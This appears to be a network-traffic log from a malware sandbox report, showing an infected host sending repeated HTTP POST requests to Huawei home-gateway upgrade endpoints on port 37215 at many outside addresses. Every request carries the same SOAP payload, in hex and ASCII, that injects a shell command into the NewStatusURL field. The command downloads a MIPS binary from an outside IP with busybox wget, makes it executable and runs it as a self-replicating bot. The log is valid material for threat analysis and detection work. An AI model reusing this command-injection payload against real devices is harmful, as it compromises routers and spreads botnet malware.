                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1770192.168.2.2352458217.110.41.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543200016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1771192.168.2.235635667.82.68.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543200970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1772192.168.2.2334932197.167.225.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543242931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1773192.168.2.234101841.28.231.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543250084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1774192.168.2.2336264157.93.47.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543256998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1775192.168.2.2333464197.100.218.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543265104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1776192.168.2.2337494197.62.255.11037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543318033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1777192.168.2.2338528143.119.240.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543318987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1778192.168.2.233297436.186.2.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543369055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1779192.168.2.2343798174.85.90.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543370008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
